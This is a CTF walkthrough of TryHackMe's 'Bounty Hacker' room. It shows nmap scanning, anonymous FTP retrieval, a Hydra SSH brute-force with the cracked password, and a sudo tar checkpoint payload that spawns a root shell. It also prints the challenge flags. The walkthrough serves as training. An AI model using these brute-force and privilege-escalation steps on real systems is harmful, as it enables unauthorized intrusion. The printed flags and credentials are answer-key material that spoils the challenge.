Understanding the CTF Challenge
Capture The Flag (CTF) challenges are hands-on exercises designed to test and improve cybersecurity skills. This guide explores the "Bounty Hacker" room on TryHackMe, demonstrating how to identify vulnerabilities, exploit services, and escalate privileges to gain root access. By following this walkthrough, you'll learn essential techniques like network scanning, brute-forcing, and privilege escalation in a controlled environment.
Key Phases of the Challenge
- Reconnaissance: Identify open ports and services using nmap
- Exploitation: Leverage weak configurations (e.g., anonymous FTP login)
- Credential Attacks: Brute-force SSH access with Hydra
- Privilege Escalation: Abuse sudo permissions to gain root access
Step 1: Reconnaissance with Nmap
Start by scanning the target machine to discover open ports and running services. This step is critical for identifying potential attack vectors.
Command
nmap -sC -sV -A -T4 -v -p- 10.10.69.196
Scan Results
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 7.2p2 |
| 80 | HTTP | Apache httpd 2.4.18 |
Note: The -sC flag runs default scripts, -sV detects service versions, -A enables OS detection, -p- scans all 65535 TCP ports instead of the default top 1000, and -T4 uses a faster timing template.
Step 2: Exploiting FTP for Initial Access
The FTP service allows anonymous login, a common misconfiguration that can expose sensitive files.
Retrieve Files
- Connect to FTP:
ftp 10.10.69.196
  - Username: anonymous
  - Password: (leave blank)
- Download the files:
get locks.txt
get task.txt
Analyzing task.txt
The file reveals the username lin, which will be useful for later steps.
Step 3: Brute-Forcing SSH with Hydra
The locks.txt file contains potential passwords. Use Hydra to brute-force SSH access.
Prepare Wordlists
- Create users.txt containing the username lin.
- Use locks.txt as the password list.
Execute Hydra
hydra ssh://10.10.69.196 -L users.txt -P locks.txt
Successful Credentials
[22][ssh] host: 10.10.69.196 login: lin password: RedDr4gonSynd1cat3
Step 4: Gaining User Access
Log in via SSH and retrieve the user.txt flag.
Connect to SSH
ssh lin@10.10.69.196
- Password:
RedDr4gonSynd1cat3
Read user.txt
THM{CR1M3_SyNd1C4T3}
Step 5: Privilege Escalation to Root
Check sudo permissions to identify misconfigurations.
Check Sudo Rights
sudo -l
Output:
User lin may run the following commands on bountyhacker:
(root) /bin/tar
Exploit tar for Root Access
Use the following payload to spawn a root shell:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Retrieve root.txt
THM{80UN7Y_h4cK3r}
Common Pitfalls & Best Practices
- FTP Misconfigurations: Always check for anonymous login. Disable it in production environments.
- Brute-Force Attacks: Use strong passwords and rate-limiting to mitigate risks.
- Sudo Abuse: Restrict sudo permissions to essential commands only.
Learn More
- Privilege Escalation Techniques: Explore GTFOBins for binaries that can be abused for privilege escalation.
- Nmap Scanning: Learn advanced scanning techniques with the Nmap Official Book.
- TryHackMe Rooms: Practice similar challenges in the Offensive Pentesting Path.